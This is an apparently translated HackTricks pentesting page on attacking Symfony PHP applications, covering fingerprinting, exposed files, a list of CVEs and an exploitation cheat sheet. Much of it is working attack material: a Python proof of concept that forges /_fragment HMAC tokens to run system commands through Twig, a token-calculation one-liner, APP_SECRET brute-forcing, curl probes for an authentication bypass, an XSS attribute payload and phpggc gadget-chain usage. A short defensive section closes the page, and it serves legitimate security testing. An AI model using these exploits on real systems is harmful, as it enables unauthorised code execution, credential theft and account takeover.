Symfony

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!

加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

Symfony 是最常用的 PHP 框架之一，经常出现在对企业、电商和 CMS 目标的评估中（Drupal, Shopware, Ibexa, OroCRM … 全部都嵌入了 Symfony 组件）。本页汇总了攻击性提示、常见错误配置和近期漏洞，当你发现 Symfony 应用时应将这些项列入检查清单。

历史说明：生态系统中很大一部分仍运行 5.4 LTS 分支（EOL 2025 年 11 月）。Symfony 7.4 在 2025 年 11 月 成为新的 LTS，并将获得安全修复直到 2029 年 11 月。始终核实确切的补丁级别，因为许多 2024‑2026 的公告仅在 micro release 中修复。

侦察与枚举

Finger-printing

HTTP 响应头：X-Powered-By: Symfony, X-Debug-Token, X-Debug-Token-Link 或以 sf_redirect, sf_session, MOCKSESSID 开头的 cookies。
Source code leaks (composer.json, composer.lock, /vendor/…) often reveal the exact version:

curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'

只有在 Symfony 中存在的公开路由：
/_profiler (Symfony Profiler & debug toolbar)
/_wdt/<token> (“Web Debug Toolbar”)
/_error/{code}.{_format} (漂亮的错误页面)
/app_dev.php, /config.php, /config_dev.php (4.0 之前的 dev 前端控制器)
使用 Wappalyzer、BuiltWith 或 ffuf/feroxbuster 的 wordlists: symfony.txt → 查找 /_fragment, /_profiler, .env, .htaccess。

有趣的文件与端点

Path	Why it matters
`/.env`, `/.env.local`, `/.env.prod`	Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys
`/.git`, `.svn`, `.hg`	源码披露 → 凭证 + 业务逻辑
`/var/log/*.log`, `/log/dev.log`	Web-root 错误配置会暴露堆栈跟踪
`/_profiler`	完整请求历史、配置、service container、APP_SECRET (≤ 3.4)
`/_fragment`	ESI/HInclude 使用的入口点。一旦你知道 `APP_SECRET` 即可 abuse
`/vendor/phpunit/phpunit/phpunit`	如果可访问则为 PHPUnit RCE (CVE-2017-9841)
`/index.php/_error/{code}`	指纹识别 & 有时会 leak 异常跟踪

高危漏洞

1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)

原始为 CVE-2019-18889，但当 debug 被启用或 .env 被暴露时，仍常见于现代目标。
一旦你知道 32 字符的 APP_SECRET，即可制作 HMAC token 并滥用内部的 render() 控制器来执行任意 Twig：

# PoC – requires the secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}"   # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)

优秀的 write-up & exploit 脚本：Ambionics blog（见 References）。

2. PATH_INFO auth bypass – CVE-2025-64500 (HttpFoundation)

影响低于 5.4.50、6.4.29 和 7.3.7 的版本。路径归一化可能会去掉前导 /，从而破坏依赖 /admin 等的访问控制规则。
快速测试：curl -H 'PATH_INFO: admin/secret' https://target/index.php → 如果在无认证下到达了 admin 路由，则表明存在漏洞。
通过升级 symfony/http-foundation 或将整个框架升级到修复的补丁级别来修复。

3. MSYS2/Git-Bash argument mangling – CVE-2026-24739 (Process)

影响在 Windows 上从 MSYS2（Git-Bash、mingw）运行 PHP 时的 5.4.51 以下、6.4.33 以下、7.3.11 以下、7.4.5 以下和 8.0.5 以下版本。Process 未对 = 进行正确引用，导致路径被篡改；破坏性命令（rmdir, del）可能针对非预期目录。
如果你能上传 PHP 脚本或影响调用 Process 的 Composer/CLI helper，可构造含 = 的参数（例如 E:/=tmp/delete）以触发路径改写。

4. Runtime env/argv injection – CVE-2024-50340 (Runtime)

当 register_argv_argc=On 且使用非 SAPI 运行时，精心构造的查询字符串可能通过 argv 解析翻转 APP_ENV/APP_DEBUG。在 5.4.46/6.4.14/7.1.7 中已修补。
在日志中查找是否接受诸如 /?--env=prod 之类的条目。

5. URL validation / open redirect – CVE-2024-50345 (HttpFoundation)

URI 中的特殊字符未按浏览器相同方式验证，允许重定向到攻击者控制的域。已在 5.4.46/6.4.14/7.1.7 中修复。

6. Symfony UX attribute injection – CVE-2025-47946

symfony/ux-twig-component & symfony/ux-live-component 在 2.25.1 之前会在渲染 {{ attributes }} 时不转义 → attribute injection/XSS。如果应用允许用户定义组件属性（例如管理 CMS、邮件模板），可以链式导致脚本注入。
将两个包更新到 2.25.1+。作为手动利用方式，将 JS 放在传给自定义组件的属性值中并触发渲染。

7. Windows Process Hijack – CVE-2024-51736 (Process)

Process 组件在 Windows 上会在 PATH 之前搜索当前工作目录。攻击者如果能在可写的 web-root 上传 tar.exe、cmd.exe 等并触发 Process（例如文件解压、PDF 生成），即可获得命令执行。
在 5.4.50、6.4.14、7.1.7 中修复。

8. Session-Fixation – CVE-2023-46733

Authentication guard 在登录后重用了现有 session ID。如果攻击者在受害者认证之前设置了 cookie，则可在登录后劫持账户。

9. Twig sandbox XSS – CVE-2023-46734

在暴露用户可控模板的应用（管理 CMS、邮件构建器）中，nl2br 过滤器可被滥用以绕过 sandbox 并注入 JS。

10. Symfony 1 gadget chains (still found in legacy apps)

phpggc symfony/1 system id 会生成一个 Phar payload，当对像 sfNamespacedParameterHolder 之类的类进行 unserialize() 时会触发 RCE。检查文件上传端点和 phar:// 包装器。

PHP - Deserialization + Autoload Classes

利用速查表

Calculate HMAC token for `/_fragment`

python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs     = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"

Bruteforce 弱的 `APP_SECRET`

cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target

通过暴露的 Symfony Console 实现 RCE

如果 bin/console 可以通过 php-fpm 或 direct CLI upload 访问：

php bin/console about        # confirm it works
php bin/console cache:clear --no-warmup

在 cache directory 内使用 deserialization gadgets，或者编写一个恶意的 Twig template，该模板将在下一个请求时被执行。

快速探测 PATH_INFO bypass (CVE-2025-64500)

curl -i -H 'PATH_INFO: admin/secret' https://target/index.php
# If it returns protected content without redirect/auth, the Request normalization is vulnerable.

Spray UX attribute injection (CVE-2025-47946)

{# attacker-controlled attribute value #}
<live:button {{ attributes|merge({'onclick':'alert(1)'}) }} />

如果渲染的输出未经转义地回显该属性，则 XSS 会成功。请升级到 2.25.1+。

防御要点

Never deploy debug (APP_ENV=dev, APP_DEBUG=1) 到生产环境；在 web-server 配置中屏蔽 /app_dev.php、/_profiler、/_wdt。
将密钥存放在 env vars 或 vault/secrets.local.php 中，切勿放在可通过 document-root 访问的文件中。
强制执行补丁管理 —— 订阅 Symfony 安全通告并至少保持 LTS 补丁级别（5.4.x 到 Nov 2025，6.4 到 Nov 2027，7.4 到 Nov 2029）。
如果运行在 Windows 上，立即升级以缓解 CVE-2024-51736 & CVE-2026-24739，或增加 open_basedir/disable_functions 的纵深防护。

有用的进攻工具

ambionics/symfony-exploits – secret-fragment RCE、调试器路由发现。
phpggc – 现成的 gadget chains 适用于 Symfony 1 & 2。
sf-encoder – 用于计算 _fragment HMAC 的小助手（Go 实现）。

References

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!

加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。